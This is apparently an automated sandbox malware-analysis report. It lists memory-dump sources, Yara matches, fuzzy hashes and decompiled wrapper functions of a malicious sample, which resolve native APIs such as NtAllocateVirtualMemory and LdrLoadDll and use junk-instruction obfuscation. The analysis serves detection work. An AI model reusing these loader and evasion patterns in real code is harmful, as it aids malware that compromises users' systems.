                                                              APIs
                                                              • SetWindowLongW.USER32(?,?,?), ref: 028DDF1D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetWindowLongW.USER32(?,?,?), ref: 028DDF1D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236871602.0000000000BFD000.00000040.00000001.sdmp, Offset: 00BFD000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.236853997.0000000000BED000.00000040.00000001.sdmp, Offset: 00BED000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              C-Code - Quality: 37%
                                                              			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                              				void* _t18;
                                                              				void* _t27;
                                                              				intOrPtr* _t28;
                                                              
                                                              				_t13 = _a4;
                                                              				_t28 = _a4 + 0xc48;
                                                              				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                              				_t6 =  &_a32; // 0x414d42
                                                              				_t12 =  &_a8; // 0x414d42
                                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                              				return _t18;
                                                              			}







                                                              APIs
                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: BMA$BMA
                                                              • API String ID: 2738559852-2163208940
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                              				intOrPtr* _v8;
                                                              				struct _EXCEPTION_RECORD _v12;
                                                              				struct _OBJDIR_INFORMATION _v16;
                                                              				char _v536;
                                                              				void* _t15;
                                                              				struct _OBJDIR_INFORMATION _t17;
                                                              				struct _OBJDIR_INFORMATION _t18;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              
                                                              				_t24 = _a8;
                                                              				_v8 =  &_v536;
                                                              				_t15 = E0041C650( &_v12, 0x104, _a8);
                                                              				_t31 = _t30 + 0xc;
                                                              				if(_t15 != 0) {
                                                              					_push(_v8);
                                                              					_t17 = E0041CA70(_v8, _t24, __eflags);
                                                              					_t32 = _t31 + 4;
                                                              					__eflags = _t17;
                                                              					if(_t17 != 0) {
                                                              						E0041CCF0( &_v12, 0);
                                                              						_t32 = _t32 + 8;
                                                              					}
                                                              					_t18 = E0041AEA0(_v8);
                                                              					_v16 = _t18;
                                                              					__eflags = _t18;
                                                              					if(_t18 == 0) {
                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                              						return _v16;
                                                              					}
                                                              					return _t18;
                                                              				} else {
                                                              					return _t15;
                                                              				}
                                                              			}














                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				long _t21;
                                                              				void* _t31;
                                                              
                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                              				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              				return _t21;
                                                              			}





                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E00419F3A(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				char _v1;
                                                              				long _t18;
                                                              				void* _t27;
                                                              
                                                              				asm("out dx, eax");
                                                              				_push( &_v1);
                                                              				_t14 = _a4;
                                                              				_t4 = _t14 + 0xc60; // 0xca0
                                                              				E0041A960(_t27, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t18;
                                                              			}






                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				long _t14;
                                                              				void* _t21;
                                                              
                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                              				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t14;
                                                              			}





                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 62%
                                                              			E00419E8C(void* __esi, intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t12;
                                                              				void* _t14;
                                                              
                                                              				asm("out dx, eax");
                                                              				_t14 = __esi + 1;
                                                              				asm("stosb");
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_push(_t14);
                                                              				_t3 = _t5 + 0xc50; // 0x40a923
                                                              				E0041A960(_t12, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}






                                                              APIs
                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00419E90(intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_t3 = _t5 + 0xc50; // 0x40a923
                                                              				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}





                                                              APIs
                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              • Instruction Fuzzy Hash: 1890026123180542D20065A98C14B070109A7D0343F91C115A0544554CC95588716661
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
                                                              • Instruction ID: 40df6e560410b834ef39bcc67f3213546e1b37eec6f129d181373a5b9c87354c
                                                              • Opcode Fuzzy Hash: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
                                                              • Instruction Fuzzy Hash: 2690027122100D02D1807199840464A0109A7D1342FD1C015A0415654DCA558A6977E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
                                                              • Instruction ID: fcf73888d072860bb51d07e3df836e37d8bf1f9d8d878cc2e1b118a7a1a7090e
                                                              • Opcode Fuzzy Hash: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
                                                              • Instruction Fuzzy Hash: AB90027122108D02D1106199C40474A0109A7D0342F95C411A4814658DC6D588A17261
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E00409A90(intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				char _v24;
                                                              				char _v284;
                                                              				char _v804;
                                                              				char _v840;
                                                              				void* __ebx;
                                                              				void* __esi;
                                                              				void* _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t39;
                                                              				void* _t50;
                                                              				intOrPtr* _t52;
                                                              				void* _t53;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              
                                                              				_t52 = _a4;
                                                              				_t39 = 0; // executed
                                                              				_t24 = E00407E80(_t52,  &_v24); // executed
                                                              				_t54 = _t53 + 8;
                                                              				if(_t24 != 0) {
                                                              					E00408090( &_v24,  &_v840);
                                                              					_t55 = _t54 + 8;
                                                              					do {
                                                              						E0041B810( &_v284, 0x104);
                                                              						_t47 =  &_v284;
                                                              						E0041BE80( &_v284,  &_v804);
                                                              						_t56 = _t55 + 0x10;
                                                              						_t50 = 0x4f;
                                                              						while(1) {
                                                              							_t31 = E00414DC0(_t39, _t47, _t52, E00414D60(_t52, _t50),  &_v284);
                                                              							_t56 = _t56 + 0x10;
                                                              							if(_t31 != 0) {
                                                              								break;
                                                              							}
                                                              							_t50 = _t50 + 1;
                                                              							if(_t50 <= 0x62) {
                                                              								continue;
                                                              							} else {
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						_t9 = _t52 + 0x14; // 0xffffe045
                                                              						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                              						_t39 = 1;
                                                              						L8:
                                                              						_t33 = E004080C0( &_v24,  &_v840);
                                                              						_t55 = _t56 + 8;
                                                              					} while (_t33 != 0 && _t39 == 0);
                                                              					_t34 = E00408140(_t52,  &_v24); // executed
                                                              					if(_t39 == 0) {
                                                              						asm("rdtsc");
                                                              						asm("rdtsc");
                                                              						_v8 = _t34 - 0 + _t34;
                                                              						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                              					}
                                                              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                              					_t20 = _t52 + 0x31; // 0x5608758b
                                                              					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                              					return 1;
                                                              				} else {
                                                              					return _t24;
                                                              				}
                                                              			}






















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                              • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                              • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                              • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E004082F0(void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                              				char _v67;
                                                              				char _v68;
                                                              				void* _t12;
                                                              				intOrPtr* _t13;
                                                              				int _t14;
                                                              				long _t21;
                                                              				intOrPtr* _t25;
                                                              				void* _t26;
                                                              				void* _t30;
                                                              
                                                              				_t30 = __eflags;
                                                              				_v68 = 0;
                                                              				E0041B860( &_v67, 0, 0x3f);
                                                              				E0041C400( &_v68, 3);
                                                              				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                              				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                              				_t25 = _t13;
                                                              				if(_t25 != 0) {
                                                              					_t21 = _a8;
                                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                              					_t32 = _t14;
                                                              					if(_t14 != 0) {
                                                              						L4:
                                                              						return _t14;
                                                              					}
                                                              					_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                              					goto L4;
                                                              				}
                                                              				return _t13;
                                                              			}













                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                              • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                              • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                              • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E0041A1C1(void* __eax, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				void* _v117;
                                                              				int _t18;
                                                              				void* _t34;
                                                              
                                                              				asm("sahf");
                                                              				asm("insd");
                                                              				 *((intOrPtr*)(__edi - 8)) =  *((intOrPtr*)(__edi - 8)) + _t34;
                                                              				asm("scasb");
                                                              				asm("loopne 0xffffffe4");
                                                              				_t15 = _a4;
                                                              				E0041A960(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
                                                              				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t18;
                                                              			}







                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 626c27c0bcc5cac7642100160d3b66512319750c662cb79356149fa5ec5eb874
                                                              • Instruction ID: cb3b1f3d66f262ddaf4fde9776af361bbcfca386cce67ae9150c872f6a11a0fe
                                                              • Opcode Fuzzy Hash: 626c27c0bcc5cac7642100160d3b66512319750c662cb79356149fa5ec5eb874
                                                              • Instruction Fuzzy Hash: ECF0CDB6200204AFDB24DFA9DC81EEB77ADEF88310F108649F94D97242C631E8118BB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                              				char _t10;
                                                              				void* _t15;
                                                              
                                                              				_t3 = _a4 + 0xc74; // 0xc74
                                                              				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                              				void* _t10;
                                                              				void* _t15;
                                                              
                                                              				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                              				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				int _t10;
                                                              				void* _t15;
                                                              
                                                              				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}





                                                              0x0041a1ea
                                                              0x0041a200
                                                              0x0041a204

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E0041A0A3(int _a4) {
                                                              				intOrPtr _v0;
                                                              				void* _t11;
                                                              				void* _t14;
                                                              				void* _t15;
                                                              				void* _t17;
                                                              
                                                              				asm("sbb al, 0x66");
                                                              				asm("pushfd");
                                                              				_t17 = _t15 + 2;
                                                              				asm("stosb");
                                                              				 *(_t11 + 0x44) =  *(_t11 + 0x44) & 0x5511bf03;
                                                              				_t7 = _v0;
                                                              				_push(_t17);
                                                              				E0041A960(_t14, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                                                              				ExitProcess(_a4);
                                                              			}









                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 85ae343724c371f3073912367f700d2d1e8b9b88f7bdd131d9dbcaaa970644fc
                                                              • Instruction ID: 06490d9692adf5dd9463b5d2afd852ab35f778d60dce2ed8b6ccca7fa34e84f8
                                                              • Opcode Fuzzy Hash: 85ae343724c371f3073912367f700d2d1e8b9b88f7bdd131d9dbcaaa970644fc
                                                              • Instruction Fuzzy Hash: FCE086715102147BD220DF58CCC5FD77B68DF48794F058458BE8C2F242C635EA028BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0041A0B0(intOrPtr _a4, int _a8) {
                                                              				void* _t10;
                                                              
                                                              				_t5 = _a4;
                                                              				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                              				ExitProcess(_a8);
                                                              			}




                                                              0x0041a0b3
                                                              0x0041a0ca
                                                              0x0041a0d8

                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                                                              • Instruction ID: 243ba033f1fa935ed16f2785cc48698f715f6da06f3a2df43106aa4054c7ab8c
                                                              • Opcode Fuzzy Hash: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                                                              • Instruction Fuzzy Hash: 9BB09B719114D5C9D651D7A4460C7177A4477D4745F56C061D1420641B4778C095F6B5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Strings
                                                              • The instruction at %p tried to %s , xrefs: 0109B4B6
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0109B476
                                                              • Go determine why that thread has not released the critical section., xrefs: 0109B3C5
                                                              • *** enter .exr %p for the exception record, xrefs: 0109B4F1
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0109B484
                                                              • *** then kb to get the faulting stack, xrefs: 0109B51C
                                                              • an invalid address, %p, xrefs: 0109B4CF
                                                              • read from, xrefs: 0109B4AD, 0109B4B2
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B3D6
                                                              • *** enter .cxr %p for the context, xrefs: 0109B50D
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0109B314
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0109B39B
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0109B352
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0109B2F3
                                                              • The instruction at %p referenced memory at %p., xrefs: 0109B432
                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0109B2DC
                                                              • <unknown>, xrefs: 0109B27E, 0109B2D1, 0109B350, 0109B399, 0109B417, 0109B48E
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0109B53F
